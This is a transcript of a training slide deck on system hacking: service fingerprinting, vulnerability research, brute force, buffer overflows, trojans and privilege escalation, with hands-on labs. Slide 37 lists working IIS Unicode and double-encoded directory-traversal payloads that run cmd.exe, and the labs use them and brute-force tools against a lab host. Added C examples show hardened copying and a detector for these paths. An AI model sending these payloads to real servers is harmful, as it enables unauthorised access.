
System Hacking


Presentation Transcript


  1. System Hacking Section 4

  2. Outline
     • Service identification
     • Vulnerability identification and research
     • Exploits
     • Putting it all together
     • Target selection in large networks
     • Using automated tools

  3. Service Identification Section 4.1

  4. Service Identification • Common ports • Banners • Fingerprinting

  5. Connecting to ports • Telnet or netcat is the best way to connect to ports • Many services may be accessed directly

  6. Common ports Many services can be identified by their common port numbers

  7. Zone-h.org

  8. Alldas.de

  9. Banners
     Some services may be better identified by banners:
     • telnet on routers (2001, 4001, 6001)
     • Web daemons for applications
     • Compaq Insight Manager
     • Many systems include web configuration interfaces

  10. Banners

  11. Fingerprinting
     Some services cannot be clearly identified just by connecting to them:
     • Netbus on NT uses the same port as an RPC service on Solaris
     • Some database connections do not provide an automatic response
     Fingerprinting a service may identify what it is, even if it has moved ports

  12. Fingerprinting

  13. Vulnerability Research Section 4.2

  14. Vulnerability identification and research
     • This is the process of mapping identified security attributes of a system or application to potential vulnerabilities
     Several methods to map vulnerabilities:
     • Manually map identified systems against publicly available databases such as www.securityfocus.com, www.cert.org and vendor security alerts
     • Use public exploit code posted to various security mailing lists or hacker websites, or write your own code
     • Use automated vulnerability scanning tools such as Nessus, ISS or whisker

  15. Vulnerability research

  16. Lab
     • Explore the following security sites to identify what vulnerability information would be of use to you for the services you have identified.
     • www.securityfocus.com
     • General searches on google.com
     • www.packetstormsecurity.com
     • www.astalavista.box.sk
     • www.securiteam.com
     Time: 30 minutes

  17. Exploits Section 4.3

  18. Types of exploits • Remote exploits • Trojans • Privilege escalation

  19. Remote Exploits Section 4.3.1

  20. Remote exploits
     A ‘remote exploit’ attempts to gain access across the network and without proper authentication. Examples:
     • Brute force authentication attempts
     • Attacks bypassing integrity checkers
     • Buffer overflows
     • Sniffing (to some extent)

  21. Brute force attacks
     Most common services attacked
     • Telnet
     • FTP
     • “R” commands
     • Secure Shell
     • SNMP community names
     • Post Office Protocol (POP)
     • HyperText Transport Protocol (HTTP/HTTPS)
     • SMB

  22. Common Tools used
     • Brutus
     • Admsnmp
     • Admsmb
     • TeeNet
     • Pwscan.pl
     • Thc_hydra

  23. Remote password guessing
     • Attempting to connect to an enumerated share (such as ADMIN$ and C$) and trying username/password combinations until one works
     • A “null session” can be established with the target to obtain valid account names
     • Use an automated password guessing tool to brute force the selected shares.

  24. Brute force attacks under Windows
     Some common services prone to brute-force:
     • Web
     • Netbios
     • FTP

  25. Legion

  26. Brute force attacks under Unix
     Some common services prone to brute-force:
     • telnet
     • Ssh
     • Web
     • FTP
     • R-commands

  27. Lab
     • Use a Netbios scanning tool to identify local shares on this network
     • Use a brute force tool to attempt access to an account on 10.0.1.120
     • Warning! These tools can produce significant traffic and lock accounts.
     Time: 30 minutes

  28. Buffer overflow attacks
     FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from LOUD-FAT-BLOKE
     • Stack overflows
     • Format string overflows
     • Heap overflows
     • Overflow subverting the control path

  29. Buffer overflow attacks FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from LOUD-FAT-BLOKE

  30. Buffer overflow attacks
     FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from LOUD-FAT-BLOKE
     • Occurs when a user or process attempts to place more data into a buffer than was originally allocated
     • Commonly associated with C functions like strcpy(), strcat(), sprintf() etc.
     • Most frequently found when user input is taken and passed into an application

  31. Windows buffer overflows
     • Only a few conditions have been revealed to date
     • All of them exploited flaws in application programs
     • Very common for DoS attacks
     Exploits
     • Netmeeting 2.x by Cult of the Dead Cow
     • NT RAS by Cerberus Information Security
     • Winhlp32 by Cerberus Information Security
     • IISHack by eEye
     • Oracle Web Listener 4.0 by CIS
     • Outlook GMT token overrun by Underground Security Systems Research
     • IIS .printer

  32. Unix buffer overflows
     • Sadmind
     • ftp
     • Ssh
     • nfs

  33. Unexpected input
     • Bypassing integrity checks
     • Gaining access by providing unexpected input
     • IIS unicode
     • Web applications

  34. Format string attacks • Caused by programming errors in the formatted output family of functions, which includes printf() and sprintf() • Efforts usually focused on SUID root programs
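As an added illustration of slides 30 and 34 (example code written for this edit, not taken from the original deck), the C fragment below shows the unbounded strcpy() pattern beside a bounded copy that rejects oversized input, and a logging routine that never uses untrusted text as the printf() format. The buffer sizes and the sample name are constructed for the demo.

```c
#include <stdio.h>
#include <string.h>

/* Slide 30 pattern: strcpy() copies until the source's NUL terminator and
 * never looks at how large dst is, so an over-long src writes past the
 * buffer and into whatever follows it on the stack or heap. */
void copy_unchecked(char *dst, const char *src) {
    strcpy(dst, src);
}

/* Hardened form: the copy is bounded by the destination size, and input
 * that does not fit is rejected (return -1) instead of silently
 * overflowing or being truncated. */
int copy_bounded(char *dst, size_t dst_len, const char *src) {
    size_t n = strlen(src);
    if (dst_len == 0 || n >= dst_len) {   /* need room for data plus NUL */
        if (dst_len) dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* Slide 34 pattern: printf(untrusted) lets "%x" / "%n" in the text read or
 * write memory. The fix is a fixed format string with the untrusted data
 * passed as a %s argument, here through snprintf() so the output buffer is
 * bounded as well. Returns 0, or -1 if the line did not fit. */
int log_line(char *out, size_t out_len, const char *untrusted) {
    int w = snprintf(out, out_len, "[log] %s", untrusted);
    return (w >= 0 && (size_t)w < out_len) ? 0 : -1;
}

/* Demo with constructed input: a 16-byte field is offered a 40-byte name,
 * then a short name, then a string full of format directives. */
int demo(void) {
    char name[16], line[64];
    const char *too_long = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
    int r1 = copy_bounded(name, sizeof name, too_long);   /* -1: rejected */
    int r2 = copy_bounded(name, sizeof name, "alice");    /*  0: fits      */
    int r3 = log_line(line, sizeof line, "%x%x%n");       /*  0: treated as data */
    return (r1 == -1 && r2 == 0 && r3 == 0 &&
            strcmp(line, "[log] %x%x%n") == 0) ? 1 : 0;
}
```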

  35. Input validation attacks
     • Occurs when a program fails to recognise syntactically incorrect input
     • Occurs when a module accepts extraneous input
     • Occurs when a module fails to handle missing input fields
     • A field-value correlation error occurs
     • Common in web applications

  36. IIS vulnerabilities • Unicode and URL based attacks • Special tags in HTTP • Sample scripts to brute force

  37. IIS hacking
     • /scripts/root.exe?/c+dir
     • /MSADC/root.exe?/c+dir
     • /c/winnt/system32/cmd.exe?/c+dir
     • /d/winnt/system32/cmd.exe?/c+dir
     • /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
     • /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
     • /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
     • /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
     • /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
     • /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
     • /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
     • /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
     • /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
     • /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
     • /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
     • /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
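The request paths on slide 37 are exactly what a web-server log shows when these are tried. As an added example for this edit (not part of the original deck), the C routine below decodes percent-escapes twice, the way the double-encoded entries require, and flags the three tricks the list relies on: ".." traversal after decoding, double encoding, and overlong UTF-8 lead bytes. The flag values and the 512-byte working buffers are choices made for this example.

```c
#include <ctype.h>
#include <string.h>

static int hexval(unsigned char c) {
    if (c >= '0' && c <= '9') return c - '0';
    c = (unsigned char)tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* One pass of %XX decoding into out. Returns how many escapes were decoded.
 * A decoded 0xC0 or 0xC1 byte can only begin an overlong UTF-8 sequence
 * (the %c0%af "/" and %c1%1c "\" forms above), so it sets *overlong. */
static int pct_decode(const char *in, char *out, size_t out_len, int *overlong) {
    size_t o = 0;
    int n = 0;
    for (size_t i = 0; in[i] != '\0' && o + 1 < out_len; i++) {
        int h, l;
        if (in[i] == '%' && (h = hexval((unsigned char)in[i + 1])) >= 0
                         && (l = hexval((unsigned char)in[i + 2])) >= 0) {
            unsigned char b = (unsigned char)(h * 16 + l);
            if (b == 0xC0 || b == 0xC1) *overlong = 1;
            out[o++] = (char)b;
            i += 2;
            n++;
        } else {
            out[o++] = in[i];
        }
    }
    out[o] = '\0';
    return n;
}

/* Classify one request path. Bit flags: 1 = ".." followed by a separator
 * after full decoding (traversal), 2 = escapes still present after the
 * first pass (double encoding), 4 = overlong UTF-8 lead byte. 0 = clean. */
int classify_path(const char *path) {
    char a[512], b[512];
    int flags = 0, overlong = 0;
    pct_decode(path, a, sizeof a, &overlong);
    if (pct_decode(a, b, sizeof b, &overlong) > 0) flags |= 2;
    if (overlong) flags |= 4;
    if (strstr(b, "../") || strstr(b, "..\\") || (overlong && strstr(b, "..")))
        flags |= 1;
    return flags;
}
```

Any non-zero result is worth an alert; the first two entries on the slide (root.exe) decode cleanly and need a separate rule on the file name rather than on encoding.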

  38. Lab • Use the provided URLs to roam the filesystem of 10.0.1.120 • What is accessible and what is not? Time: 10 minutes

  39. Trojan Horses and Backdoors Section 4.3.2

  40. Windows trojans and backdoors
     These programs provide unauthorised access to a system without the user’s knowledge:
     • Theef
     • CDC BackOrifice
     • SubSeven
     • Moosucker
     A great site: http://www.tlsecurity.net

  41. Tlsecurity.net

  42. Privilege Escalation Section 4.3.3

  43. Privilege escalation • Attack used to move from normal user to superuser • Quest for Administrator • Quest for root

  44. Quest for Administrator
     • Hoovering information
     • Getadmin
     • Sechole
     • Spoofing LPC Port requests

  45. Hoovering information
     • Identify further information that will gain higher privileges
     • Srvinfo
     • Find utility
     • regdmp

  46. Getadmin
     • Windows NT 4
     • Small program written by Konstantin Sobolev
     • Adds users to the local admin group
     • Hijacks a process called winlogon
     • Patched by NT SP3

  47. Sechole
     • Similar functionality to getadmin
     • Modifies instructions in the memory of the OpenProcess API
     • Possible to launch remotely if IIS is running
     • Patched by NT SP6a

  48. Spoofing LPC Port Requests
     • Vulnerability identified by The RAZOR Team at http://razor.bindview.com
     • The code takes advantage of a flaw in one function of the Local Procedure Call (LPC) Ports API

  49. Quest for root
     • Local buffer overflow
     • Symlink
     • File Descriptor attacks
     • Signal handling
     • Core-file manipulation
     • Shared libraries
     • Kernel flaws
     • System misconfiguration
     • IFS attacks
